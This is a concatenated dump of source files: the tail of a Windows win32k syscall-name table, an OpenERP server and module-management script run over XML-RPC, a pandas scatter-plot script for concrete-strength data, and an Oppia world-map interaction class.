'NtUserDrawCaption', # 0x169
'NtUserDrawCaptionTemp', # 0x16a
'NtUserDrawIconEx', # 0x16b
'NtUserDrawMenuBarTemp', # 0x16c
'NtUserEmptyClipboard', # 0x16d
'NtUserEnableMenuItem', # 0x16e
'NtUserEnableScrollBar', # 0x16f
'NtUserEndDeferWindowPosEx', # 0x170
'NtUserEndMenu', # 0x171
'NtUserEndPaint', # 0x172
'NtUserEnumDisplayDevices', # 0x173
'NtUserEnumDisplayMonitors', # 0x174
'NtUserEnumDisplaySettings', # 0x175
'NtUserEvent', # 0x176
'NtUserExcludeUpdateRgn', # 0x177
'NtUserFillWindow', # 0x178
'NtUserFindExistingCursorIcon', # 0x179
'NtUserFindWindowEx', # 0x17a
'NtUserFlashWindowEx', # 0x17b
'NtUserGetAltTabInfo', # 0x17c
'NtUserGetAncestor', # 0x17d
'NtUserGetAppImeLevel', # 0x17e
'NtUserGetAsyncKeyState', # 0x17f
'NtUserGetAtomName', # 0x180
'NtUserGetCaretBlinkTime', # 0x181
'NtUserGetCaretPos', # 0x182
'NtUserGetClassInfo', # 0x183
'NtUserGetClassName', # 0x184
'NtUserGetClipboardData', # 0x185
'NtUserGetClipboardFormatName', # 0x186
'NtUserGetClipboardOwner', # 0x187
'NtUserGetClipboardSequenceNumber', # 0x188
'NtUserGetClipboardViewer', # 0x189
'NtUserGetClipCursor', # 0x18a
'NtUserGetComboBoxInfo', # 0x18b
'NtUserGetControlBrush', # 0x18c
'NtUserGetControlColor', # 0x18d
'NtUserGetCPD', # 0x18e
'NtUserGetCursorFrameInfo', # 0x18f
'NtUserGetCursorInfo', # 0x190
'NtUserGetDC', # 0x191
'NtUserGetDCEx', # 0x192
'NtUserGetDoubleClickTime', # 0x193
'NtUserGetForegroundWindow', # 0x194
'NtUserGetGuiResources', # 0x195
'NtUserGetGUIThreadInfo', # 0x196
'NtUserGetIconInfo', # 0x197
'NtUserGetIconSize', # 0x198
'NtUserGetImeHotKey', # 0x199
'NtUserGetImeInfoEx', # 0x19a
'NtUserGetInternalWindowPos', # 0x19b
'NtUserGetKeyboardLayoutList', # 0x19c
'NtUserGetKeyboardLayoutName', # 0x19d
'NtUserGetKeyboardState', # 0x19e
'NtUserGetKeyNameText', # 0x19f
'NtUserGetKeyState', # 0x1a0
'NtUserGetListBoxInfo', # 0x1a1
'NtUserGetMenuBarInfo', # 0x1a2
'NtUserGetMenuIndex', # 0x1a3
'NtUserGetMenuItemRect', # 0x1a4
'NtUserGetMessage', # 0x1a5
'NtUserGetMouseMovePointsEx', # 0x1a6
'NtUserGetObjectInformation', # 0x1a7
'NtUserGetOpenClipboardWindow', # 0x1a8
'NtUserGetPriorityClipboardFormat', # 0x1a9
'NtUserGetProcessWindowStation', # 0x1aa
'NtUserGetRawInputBuffer', # 0x1ab
'NtUserGetRawInputData', # 0x1ac
'NtUserGetRawInputDeviceInfo', # 0x1ad
'NtUserGetRawInputDeviceList', # 0x1ae
'NtUserGetRegisteredRawInputDevices', # 0x1af
'NtUserGetScrollBarInfo', # 0x1b0
'NtUserGetSystemMenu', # 0x1b1
'NtUserGetThreadDesktop', # 0x1b2
'NtUserGetThreadState', # 0x1b3
'NtUserGetTitleBarInfo', # 0x1b4
'NtUserGetUpdateRect', # 0x1b5
'NtUserGetUpdateRgn', # 0x1b6
'NtUserGetWindowDC', # 0x1b7
'NtUserGetWindowPlacement', # 0x1b8
'NtUserGetWOWClass', # 0x1b9
'NtUserHardErrorControl', # 0x1ba
'NtUserHideCaret', # 0x1bb
'NtUserHiliteMenuItem', # 0x1bc
'NtUserImpersonateDdeClientWindow', # 0x1bd
'NtUserInitialize', # 0x1be
'NtUserInitializeClientPfnArrays', # 0x1bf
'NtUserInitTask', # 0x1c0
'NtUserInternalGetWindowText', # 0x1c1
'NtUserInvalidateRect', # 0x1c2
'NtUserInvalidateRgn', # 0x1c3
'NtUserIsClipboardFormatAvailable', # 0x1c4
'NtUserKillTimer', # 0x1c5
'NtUserLoadKeyboardLayoutEx', # 0x1c6
'NtUserLockWindowStation', # 0x1c7
'NtUserLockWindowUpdate', # 0x1c8
'NtUserLockWorkStation', # 0x1c9
'NtUserMapVirtualKeyEx', # 0x1ca
'NtUserMenuItemFromPoint', # 0x1cb
'NtUserMessageCall', # 0x1cc
'NtUserMinMaximize', # 0x1cd
'NtUserMNDragLeave', # 0x1ce
'NtUserMNDragOver', # 0x1cf
'NtUserModifyUserStartupInfoFlags', # 0x1d0
'NtUserMoveWindow', # 0x1d1
'NtUserNotifyIMEStatus', # 0x1d2
'NtUserNotifyProcessCreate', # 0x1d3
'NtUserNotifyWinEvent', # 0x1d4
'NtUserOpenClipboard', # 0x1d5
'NtUserOpenDesktop', # 0x1d6
'NtUserOpenInputDesktop', # 0x1d7
'NtUserOpenWindowStation', # 0x1d8
'NtUserPaintDesktop', # 0x1d9
'NtUserPeekMessage', # 0x1da
'NtUserPostMessage', # 0x1db
'NtUserPostThreadMessage', # 0x1dc
'NtUserPrintWindow', # 0x1dd
'NtUserProcessConnect', # 0x1de
'NtUserQueryInformationThread', # 0x1df
'NtUserQueryInputContext', # 0x1e0
'NtUserQuerySendMessage', # 0x1e1
'NtUserQueryUserCounters', # 0x1e2
'NtUserQueryWindow', # 0x1e3
'NtUserRealChildWindowFromPoint', # 0x1e4
'NtUserRealInternalGetMessage', # 0x1e5
'NtUserRealWaitMessageEx', # 0x1e6
'NtUserRedrawWindow', # 0x1e7
'NtUserRegisterClassExWOW', # 0x1e8
'NtUserRegisterUserApiHook', # 0x1e9
'NtUserRegisterHotKey', # 0x1ea
'NtUserRegisterRawInputDevices', # 0x1eb
'NtUserRegisterTasklist', # 0x1ec
'NtUserRegisterWindowMessage', # 0x1ed
'NtUserRemoveMenu', # 0x1ee
'NtUserRemoveProp', # 0x1ef
'NtUserResolveDesktop', # 0x1f0
'NtUserResolveDesktopForWOW', # 0x1f1
'NtUserSBGetParms', # 0x1f2
'NtUserScrollDC', # 0x1f3
'NtUserScrollWindowEx', # 0x1f4
'NtUserSelectPalette', # 0x1f5
'NtUserSendInput', # 0x1f6
'NtUserSetActiveWindow', # 0x1f7
'NtUserSetAppImeLevel', # 0x1f8
'NtUserSetCapture', # 0x1f9
'NtUserSetClassLong', # 0x1fa
'NtUserSetClassWord', # 0x1fb
'NtUserSetClipboardData', # 0x1fc
'NtUserSetClipboardViewer', # 0x1fd
'NtUserSetConsoleReserveKeys', # 0x1fe
'NtUserSetCursor', # 0x1ff
'NtUserSetCursorContents', # 0x200
'NtUserSetCursorIconData', # 0x201
'NtUserSetDbgTag', # 0x202
'NtUserSetFocus', # 0x203
'NtUserSetImeHotKey', # 0x204
'NtUserSetImeInfoEx', # 0x205
'NtUserSetImeOwnerWindow', # 0x206
'NtUserSetInformationProcess', # 0x207
'NtUserSetInformationThread', # 0x208
'NtUserSetInternalWindowPos', # 0x209
'NtUserSetKeyboardState', # 0x20a
'NtUserSetLogonNotifyWindow', # 0x20b
'NtUserSetMenu', # 0x20c
'NtUserSetMenuContextHelpId', # 0x20d
'NtUserSetMenuDefaultItem', # 0x20e
'NtUserSetMenuFlagRtoL', # 0x20f
'NtUserSetObjectInformation', # 0x210
'NtUserSetParent', # 0x211
'NtUserSetProcessWindowStation', # 0x212
'NtUserSetProp', # 0x213
'NtUserSetRipFlags', # 0x214
'NtUserSetScrollInfo', # 0x215
'NtUserSetShellWindowEx', # 0x216
'NtUserSetSysColors', # 0x217
'NtUserSetSystemCursor', # 0x218
'NtUserSetSystemMenu', # 0x219
'NtUserSetSystemTimer', # 0x21a
'NtUserSetThreadDesktop', # 0x21b
'NtUserSetThreadLayoutHandles', # 0x21c
'NtUserSetThreadState', # 0x21d
'NtUserSetTimer', # 0x21e
'NtUserSetWindowFNID', # 0x21f
'NtUserSetWindowLong', # 0x220
'NtUserSetWindowPlacement', # 0x221
'NtUserSetWindowPos', # 0x222
'NtUserSetWindowRgn', # 0x223
'NtUserSetWindowsHookAW', # 0x224
'NtUserSetWindowsHookEx', # 0x225
'NtUserSetWindowStationUser', # 0x226
'NtUserSetWindowWord', # 0x227
'NtUserSetWinEventHook', # 0x228
'NtUserShowCaret', # 0x229
'NtUserShowScrollBar', # 0x22a
'NtUserShowWindow', # 0x22b
'NtUserShowWindowAsync', # 0x22c
'NtUserSoundSentry', # 0x22d
'NtUserSwitchDesktop', # 0x22e
'NtUserSystemParametersInfo', # 0x22f
'NtUserTestForInteractiveUser', # 0x230
'NtUserThunkedMenuInfo', # 0x231
'NtUserThunkedMenuItemInfo', # 0x232
'NtUserToUnicodeEx', # 0x233
'NtUserTrackMouseEvent', # 0x234
'NtUserTrackPopupMenuEx', # 0x235
'NtUserCalcMenuBar', # 0x236
'NtUserPaintMenuBar', # 0x237
'NtUserTranslateAccelerator', # 0x238
'NtUserTranslateMessage', # 0x239
'NtUserUnhookWindowsHookEx', # 0x23a
'NtUserUnhookWinEvent', # 0x23b
'NtUserUnloadKeyboardLayout', # 0x23c
'NtUserUnlockWindowStation', # 0x23d
'NtUserUnregisterClass', # 0x23e
'NtUserUnregisterUserApiHook', # 0x23f
'NtUserUnregisterHotKey', # 0x240
'NtUserUpdateInputContext', # 0x241
'NtUserUpdateInstance', # 0x242
'NtUserUpdateLayeredWindow', # 0x243
'NtUserGetLayeredWindowAttributes', # 0x244
'NtUserSetLayeredWindowAttributes', # 0x245
'NtUserUpdatePerUserSystemParameters', # 0x246
'NtUserUserHandleGrantAccess', # 0x247
'NtUserValidateHandleSecure', # 0x248
'NtUserValidateRect', # 0x249
'NtUserValidateTimerCallback', # 0x24a
'NtUserVkKeyScanEx', # 0x24b
'NtUserWaitForInputIdle', # 0x24c
'NtUserWaitForMsgAndEvent', # 0x24d
'NtUserWaitMessage', # 0x24e
'NtUserWin32PoolAllocationStats', # 0x24f
'NtUserWindowFromPoint', # 0x250
'NtUserYieldTask', # 0x251
'NtUserRemoteConnect', # 0x252
'NtUserRemoteRedrawRectangle', # 0x253
'NtUserRemoteRedrawScreen', # 0x254
'NtUserRemoteStopScreenUpdates', # 0x255
'NtUserCtxDisplayIOCtl', # 0x256
'NtGdiEngAssociateSurface', # 0x257
'NtGdiEngCreateBitmap', # 0x258
'NtGdiEngCreateDeviceSurface', # 0x259
'NtGdiEngCreateDeviceBitmap', # 0x25a
'NtGdiEngCreatePalette', # 0x25b
'NtGdiEngComputeGlyphSet', # 0x25c
'NtGdiEngCopyBits', # 0x25d
'NtGdiEngDeletePalette', # 0x25e
'NtGdiEngDeleteSurface', # 0x25f
'NtGdiEngEraseSurface', # 0x260
'NtGdiEngUnlockSurface', # 0x261
'NtGdiEngLockSurface', # 0x262
'NtGdiEngBitBlt', # 0x263
'NtGdiEngStretchBlt', # 0x264
'NtGdiEngPlgBlt', # 0x265
'NtGdiEngMarkBandingSurface', # 0x266
'NtGdiEngStrokePath', # 0x267
'NtGdiEngFillPath', # 0x268
'NtGdiEngStrokeAndFillPath', # 0x269
'NtGdiEngPaint', # 0x26a
'NtGdiEngLineTo', # 0x26b
'NtGdiEngAlphaBlend', # 0x26c
'NtGdiEngGradientFill', # 0x26d
'NtGdiEngTransparentBlt', # 0x26e
'NtGdiEngTextOut', # 0x26f
'NtGdiEngStretchBltROP', # 0x270
'NtGdiXLATEOBJ_cGetPalette', # 0x271
'NtGdiXLATEOBJ_iXlate', # 0x272
'NtGdiXLATEOBJ_hGetColorTransform', # 0x273
'NtGdiCLIPOBJ_bEnum', # 0x274
'NtGdiCLIPOBJ_cEnumStart', # 0x275
'NtGdiCLIPOBJ_ppoGetPath', # 0x276
'NtGdiEngDeletePath', # 0x277
'NtGdiEngCreateClip', # 0x278
'NtGdiEngDeleteClip', # 0x279
'NtGdiBRUSHOBJ_ulGetBrushColor', # 0x27a
'NtGdiBRUSHOBJ_pvAllocRbrush', # 0x27b
'NtGdiBRUSHOBJ_pvGetRbrush', # 0x27c
'NtGdiBRUSHOBJ_hGetColorTransform', # 0x27d
'NtGdiXFORMOBJ_bApplyXform', # 0x27e
'NtGdiXFORMOBJ_iGetXform', # 0x27f
'NtGdiFONTOBJ_vGetInfo', # 0x280
'NtGdiFONTOBJ_pxoGetXform', # 0x281
'NtGdiFONTOBJ_cGetGlyphs', # 0x282
'NtGdiFONTOBJ_pifi', # 0x283
'NtGdiFONTOBJ_pfdg', # 0x284
'NtGdiFONTOBJ_pQueryGlyphAttrs', # 0x285
'NtGdiFONTOBJ_pvTrueTypeFontFile', # 0x286
'NtGdiFONTOBJ_cGetAllGlyphHandles', # 0x287
'NtGdiSTROBJ_bEnum', # 0x288
'NtGdiSTROBJ_bEnumPositionsOnly', # 0x289
'NtGdiSTROBJ_bGetAdvanceWidths', # 0x28a
'NtGdiSTROBJ_vEnumStart', # 0x28b
'NtGdiSTROBJ_dwGetCodePage', # 0x28c
'NtGdiPATHOBJ_vGetBounds', # 0x28d
'NtGdiPATHOBJ_bEnum', # 0x28e
'NtGdiPATHOBJ_vEnumStart', # 0x28f
'NtGdiPATHOBJ_vEnumStartClipLines', # 0x290
'NtGdiPATHOBJ_bEnumClipLines', # 0x291
'NtGdiGetDhpdev', # 0x292
'NtGdiEngCheckAbort', # 0x293
'NtGdiHT_Get8BPPFormatPalette', # 0x294
'NtGdiHT_Get8BPPMaskPalette', # 0x295
'NtGdiUpdateTransform', # 0x296
'NtGdiSetPUMPDOBJ', # 0x297
'NtGdiBRUSHOBJ_DeleteRbrush', # 0x298
'NtGdiUMPDEngFreeUserMem', # 0x299
'NtGdiDrawStream', # 0x29a
],
]
| gpl-2.0 |
dkodnik/Ant | openerp/addons/base_quality_interrogation.py | 58 | 14692 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import xmlrpclib
import optparse
import sys
import threading
import os
import time
import base64
import socket
import string
# Super-admin password used for database create/drop over the /xmlrpc/db service.
admin_passwd = 'admin'
# Seconds to sleep between connection attempts while the server starts up.
waittime = 10
# Number of retries performed so far (mutated by execute()).
wait_count = 0
# Maximum number of retries before giving up on the server.
wait_limit = 12
def to_decode(s):
    """Best-effort coercion of *s* into a byte string.

    Tries a utf-8 encode first, then latin; if both raise, falls back to
    an ascii decode, and finally returns *s* unchanged.
    """
    for codec in ('utf-8', 'latin'):
        try:
            return s.encode(codec)
        except UnicodeError:
            pass
    try:
        return s.decode('ascii')
    except UnicodeError:
        return s
def start_server(root_path, port, netport, addons_path):
    """Launch the OpenERP server via os.system (blocks until it exits).

    The pid is written to ./openerp.pid so clean() can kill it later.
    """
    command = ('python2.5 %sopenerp-server --pidfile=openerp.pid --no-xmlrpcs'
               ' --xmlrpc-port=%s --netrpc-port=%s --addons-path=%s'
               % (root_path, str(port), str(netport), addons_path))
    os.system(command)
def clean():
    """Kill the server whose pid was recorded in openerp.pid, if any."""
    if not os.path.isfile('openerp.pid'):
        return
    pid_file = open('openerp.pid')
    pid = int(pid_file.read())
    pid_file.close()
    if pid:
        # Signal 9 == SIGKILL: the server is stopped unconditionally.
        os.kill(pid, 9)
def execute(connector, method, *args):
    """Call *method* on the XML-RPC *connector*, retrying while the server
    is still starting up.

    A connection-refused socket error (errno 111) is treated as "server not
    listening yet": sleep ``waittime`` seconds and retry recursively, up to
    ``wait_limit`` attempts, after which the server is killed and the
    script exits.  Other socket errors are re-raised.  On success the
    global retry counter is reset and the RPC result returned.
    """
    global wait_count
    res = False
    try:
        res = getattr(connector,method)(*args)
    except socket.error,e:
        # errno 111 == ECONNREFUSED: nothing is accepting on the port yet.
        if e.args[0] == 111:
            if wait_count > wait_limit:
                # NOTE(review): the message says "seconds" but wait_limit
                # actually counts retries (each waittime seconds long).
                print "Server is taking too long to start, it has exceeded the maximum limit of %d seconds." % wait_limit
                clean()
                sys.exit(1)
            print 'Please wait %d sec to start server....' % waittime
            wait_count += 1
            time.sleep(waittime)
            res = execute(connector, method, *args)
        else:
            raise e
    wait_count = 0
    return res
def login(uri, dbname, user, pwd):
    """Authenticate against *dbname* and return the numeric user id
    (falsy on failure)."""
    common = xmlrpclib.ServerProxy('%s/xmlrpc/common' % uri)
    return execute(common, 'login', dbname, user, pwd)
def import_translate(uri, user, pwd, dbname, translate_in):
    """Import .po translation files into *dbname* by driving the
    'base.language.import' wizard over XML-RPC.

    *translate_in* is a list of file paths; the language code is taken
    from each file's basename (e.g. .../fr_FR.po -> fr_FR).
    """
    uid = login(uri, dbname, user, pwd)
    if uid:
        conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
        wiz_id = execute(conn,'create',dbname, uid, pwd, 'base.language.import')
        for trans_in in translate_in:
            # Language code = file name without its extension.
            lang,ext = os.path.splitext(trans_in.split('/')[-1])
            state = 'init'
            datas = {'form':{}}
            # Drive the wizard's state machine until it reports 'end'.
            while state!='end':
                res = execute(conn,'execute',dbname, uid, pwd, wiz_id, datas, state, {})
                # Merge any form values the wizard sends back.
                if 'datas' in res:
                    datas['form'].update( res['datas'].get('form',{}) )
                if res['type']=='form':
                    # Seed every field with its default value, then fill in
                    # the language identification and the raw file contents.
                    for field in res['fields'].keys():
                        datas['form'][field] = res['fields'][field].get('value', False)
                    state = res['state'][-1][0]
                    trans_obj = open(trans_in)
                    datas['form'].update({
                        'name': lang,
                        'code': lang,
                        'data' : base64.encodestring(trans_obj.read())
                    })
                    trans_obj.close()
                elif res['type']=='action':
                    state = res['state']
def check_quality(uri, user, pwd, dbname, modules, quality_logs):
    """Run the 'module.quality.check' wizard for each module and write one
    HTML report per module under the quality-logs directory.

    Exits the process (status 1) when login fails.
    """
    uid = login(uri, dbname, user, pwd)
    # NOTE(review): plain string concatenation -- quality_logs is expected to
    # end with a path separator (or be empty), otherwise the directory name
    # becomes e.g. 'logsquality-logs'.  Confirm against callers.
    quality_logs += 'quality-logs'
    if uid:
        conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
        final = {}
        for module in modules:
            qualityresult = {}
            test_detail = {}
            quality_result = execute(conn,'execute', dbname, uid, pwd,'module.quality.check','check_quality',module)
            # Build a single-page report: a <ul> of anchors linking to one
            # <div> per individual quality test.
            detail_html = ''
            html = '''<html><body><a name="TOP"></a>'''
            html +="<h1> Module: %s </h1>"%(quality_result['name'])
            html += "<h2> Final score: %s</h2>"%(quality_result['final_score'])
            html += "<div id='tabs'>"
            html += "<ul>"
            for x,y,detail in quality_result['check_detail_ids']:
                test = detail.get('name')
                msg = detail.get('message','')
                score = round(float(detail.get('score',0)),2)
                # Anchor ids must not contain spaces.
                html += "<li><a href=\"#%s\">%s</a></li>"%(test.replace(' ','-'),test)
                detail_html +='''<div id=\"%s\"><h3>%s (Score : %s)</h3><font color=red><h5>%s</h5></font>%s</div>'''%(test.replace(' ', '-'), test, score, msg, detail.get('detail', ''))
                test_detail[test] = (score,msg,detail.get('detail',''))
            html += "</ul>"
            html += "%s"% detail_html
            html += "</div></body></html>"
            if not os.path.isdir(quality_logs):
                os.mkdir(quality_logs)
            fp = open('%s/%s.html'%(quality_logs,module),'wb')
            fp.write(to_decode(html))
            fp.close()
            #final[quality_result['name']] = (quality_result['final_score'],html,test_detail)
            #fp = open('quality_log.pck','wb')
            #pck_obj = pickle.dump(final,fp)
            #fp.close()
            #print "LOG PATH%s"%(os.path.realpath('quality_log.pck'))
        return True
    else:
        print 'Login Failed...'
        clean()
        sys.exit(1)
def wait(id, url=''):
    """Poll the /xmlrpc/db service until the asynchronous operation *id*
    reports 100% progress, then return True."""
    db_service = xmlrpclib.ServerProxy(url + '/xmlrpc/db')
    progress = 0.0
    while progress != 1.0:
        progress, _users = execute(db_service, 'get_progress', admin_passwd, id)
    return True
def create_db(uri, dbname, user='admin', pwd='admin', lang='en_US'):
    """Create database *dbname* (dropping any existing one first), wait for
    the asynchronous creation to finish, then install base_module_quality.

    Returns True on completion.
    """
    # Fix: the original also built three ServerProxy objects (/xmlrpc/object,
    # /xmlrpc/wizard, /xmlrpc/common) that were never used; constructing a
    # ServerProxy performs no network traffic, so dropping them is safe.
    conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/db')
    db_list = execute(conn, 'list')
    if dbname in db_list:
        drop_db(uri, dbname)
    # 'create' is asynchronous: it returns an id that wait() polls on.
    id = execute(conn, 'create', admin_passwd, dbname, True, lang)
    wait(id, uri)
    install_module(uri, dbname, ['base_module_quality'], user=user, pwd=pwd)
    return True
def drop_db(uri, dbname):
    """Drop *dbname* on the server if it exists; always returns True."""
    db_service = xmlrpclib.ServerProxy(uri + '/xmlrpc/db')
    if dbname in execute(db_service, 'list'):
        execute(db_service, 'drop', admin_passwd, dbname)
    return True
def make_links(uri, uid, dbname, source, destination, module, user, pwd):
    """Symlink *module* from one of the *source* directories into
    *destination*, refresh the server's module list, and recurse over the
    module's declared dependencies.

    Returns True for core modules that are skipped, False otherwise.
    """
    if module in ('base', 'quality_integration_server'):
        return True
    link_path = destination + '/' + module
    # Replace any stale symlink before linking the current sources.
    if os.path.islink(link_path):
        os.unlink(link_path)
    for src_dir in source:
        candidate = src_dir + '/' + module
        if os.path.isdir(candidate):
            os.symlink(candidate, link_path)
    obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
    execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'update_list')
    module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name', '=', module)])
    if module_ids:
        data = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'read', module_ids[0], ['name', 'dependencies_id'])
        dep_records = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module.dependency', 'read', data['dependencies_id'], ['name'])
        for dep in dep_records:
            make_links(uri, uid, dbname, source, destination, dep['name'], user, pwd)
    return False
def install_module(uri, dbname, modules, addons='', extra_addons='', user='admin', pwd='admin'):
    """Install *modules* in *dbname*, optionally symlinking them (and their
    dependencies) from *extra_addons* into *addons* first, then run the
    'module.upgrade.simple' wizard to apply the scheduled installation.

    Always returns True.
    """
    uid = login(uri, dbname, user, pwd)
    if extra_addons:
        extra_addons = extra_addons.split(',')
    if not uid:
        return True
    if addons and extra_addons:
        for module in modules:
            make_links(uri, uid, dbname, extra_addons, addons, module, user, pwd)
    obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
    wizard_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
    module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name', 'in', modules)])
    execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'button_install', module_ids)
    wiz_id = execute(wizard_conn, 'create', dbname, uid, pwd, 'module.upgrade.simple')
    # Step the wizard through its states: init -> start -> end.
    state = 'init'
    while state != 'end':
        execute(wizard_conn, 'execute', dbname, uid, pwd, wiz_id, {}, state, {})
        state = 'start' if state == 'init' else 'end'
    return True
def upgrade_module(uri, dbname, modules, user='admin', pwd='admin'):
    """Schedule an upgrade of *modules* in *dbname* and run the
    'module.upgrade.simple' wizard to apply it.

    Always returns True.
    """
    uid = login(uri, dbname, user, pwd)
    if not uid:
        return True
    obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
    wizard_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
    module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name', 'in', modules)])
    execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'button_upgrade', module_ids)
    wiz_id = execute(wizard_conn, 'create', dbname, uid, pwd, 'module.upgrade.simple')
    # Step the wizard through its states: init -> start -> end.
    state = 'init'
    while state != 'end':
        execute(wizard_conn, 'execute', dbname, uid, pwd, wiz_id, {}, state, {})
        state = 'start' if state == 'init' else 'end'
    return True
# Command-line interface: one positional argument selects the action, the
# options below supply server/database parameters.
usage = """%prog command [options]
Basic Commands:
    start-server Start Server
    create-db Create new database
    drop-db Drop database
    install-module Install module
    upgrade-module Upgrade module
    install-translation Install translation file
    check-quality Calculate quality and dump quality result into quality_log.pck using pickle
"""
parser = optparse.OptionParser(usage)
parser.add_option("--modules", dest="modules",
    help="specify modules to install or check quality")
parser.add_option("--addons-path", dest="addons_path", help="specify the addons path")
parser.add_option("--quality-logs", dest="quality_logs", help="specify the path of quality logs files which has to stores")
parser.add_option("--root-path", dest="root_path", help="specify the root path")
parser.add_option("-p", "--port", dest="port", help="specify the TCP port", type="int")
parser.add_option("--net_port", dest="netport",help="specify the TCP port for netrpc")
parser.add_option("-d", "--database", dest="db_name", help="specify the database name")
parser.add_option("--login", dest="login", help="specify the User Login")
parser.add_option("--password", dest="pwd", help="specify the User Password")
parser.add_option("--translate-in", dest="translate_in",
    help="specify .po files to import translation terms")
parser.add_option("--extra-addons", dest="extra_addons",
    help="specify extra_addons and trunkCommunity modules path ")
(opt, args) = parser.parse_args()
# Exactly one command must be given, and it must be a known one.
if len(args) != 1:
    parser.error("incorrect number of arguments")
command = args[0]
if command not in ('start-server','create-db','drop-db','install-module','upgrade-module','check-quality','install-translation'):
    parser.error("incorrect command")
def die(cond, msg):
    """Print *msg* and exit with status 1 when *cond* is truthy."""
    if cond:
        print msg
        sys.exit(1)
# Cross-option validation: these options make no sense without -d.
die(opt.modules and (not opt.db_name),
    "the modules option cannot be used without the database (-d) option")
die(opt.translate_in and (not opt.db_name),
    "the translate-in option cannot be used without the database (-d) option")
# Normalised option values with their defaults applied.
options = {
    'addons-path' : opt.addons_path or 'addons',
    'quality-logs' : opt.quality_logs or '',
    'root-path' : opt.root_path or '',
    'translate-in': [],
    'port' : opt.port or 8069,
    'netport':opt.netport or 8070,
    'database': opt.db_name or 'terp',
    'modules' : map(string.strip, opt.modules.split(',')) if opt.modules else [],
    'login' : opt.login or 'admin',
    'pwd' : opt.pwd or '',
    'extra-addons':opt.extra_addons or []
}
# Hint:i18n-import=purchase:ar_AR.po+sale:fr_FR.po,nl_BE.po
# Expand the compact module:po-file syntax above into full .po file paths.
if opt.translate_in:
    translate = opt.translate_in
    for module_name,po_files in map(lambda x:tuple(x.split(':')),translate.split('+')):
        for po_file in po_files.split(','):
            # 'base' lives under the server's own addons directory.
            if module_name == 'base':
                po_link = '%saddons/%s/i18n/%s'%(options['root-path'],module_name,po_file)
            else:
                po_link = '%s/%s/i18n/%s'%(options['addons-path'], module_name, po_file)
            options['translate-in'].append(po_link)
uri = 'http://localhost:' + str(options['port'])
# The server is always launched in a background thread; the selected command
# then talks to it over XML-RPC (execute() retries until it is listening).
server_thread = threading.Thread(target=start_server,
        args=(options['root-path'], options['port'],options['netport'], options['addons-path']))
try:
    server_thread.start()
    if command == 'create-db':
        create_db(uri, options['database'], options['login'], options['pwd'])
    if command == 'drop-db':
        drop_db(uri, options['database'])
    if command == 'install-module':
        install_module(uri, options['database'], options['modules'],options['addons-path'],options['extra-addons'],options['login'], options['pwd'])
    if command == 'upgrade-module':
        upgrade_module(uri, options['database'], options['modules'], options['login'], options['pwd'])
    if command == 'check-quality':
        check_quality(uri, options['login'], options['pwd'], options['database'], options['modules'], options['quality-logs'])
    if command == 'install-translation':
        import_translate(uri, options['login'], options['pwd'], options['database'], options['translate-in'])
    # Success path: kill the background server and exit cleanly.
    clean()
    sys.exit(0)
except xmlrpclib.Fault, e:
    print e.faultString
    clean()
    sys.exit(1)
except Exception, e:
    print e
    clean()
    sys.exit(1)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
FernanOrtega/DAT210x | Module3/notes/2Dscatter_example.py | 1 | 1245 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 21:14:57 2017
@author: fernando
"""
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
plt.style.use('ggplot')
df = pd.read_csv('concrete.csv')
print(df.describe())

# Fix: the original repeated the same 4-line scatter-plot stanza eight times,
# once per feature.  Drive it from a list instead.  The (column, label) pairs
# preserve the original axis labels exactly ('Cement' was capitalised, the
# remaining labels were not).
feature_labels = [
    ('cement', 'Cement'),
    ('slag', 'slag'),
    ('ash', 'ash'),
    ('water', 'water'),
    ('superplastic', 'superplastic'),
    ('coarseagg', 'coarseagg'),
    ('fineagg', 'fineagg'),
    ('age', 'age'),
]
for column, label in feature_labels:
    # One figure per feature, plotted against compressive strength.
    df.plot.scatter(x=column, y='strength')
    plt.suptitle('%s vs str' % label)
    plt.xlabel(label)
    plt.ylabel('Str')
plt.show() | mit |
sunu/oppia | extensions/interactions/InteractiveMap/InteractiveMap.py | 5 | 2011 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from extensions.interactions import base
class InteractiveMap(base.BaseInteraction):
    """Interaction for pinpointing a location on a map."""
    # Human-readable name shown to exploration authors.
    name = 'World Map'
    description = 'Allows learners to specify a position on a world map.'
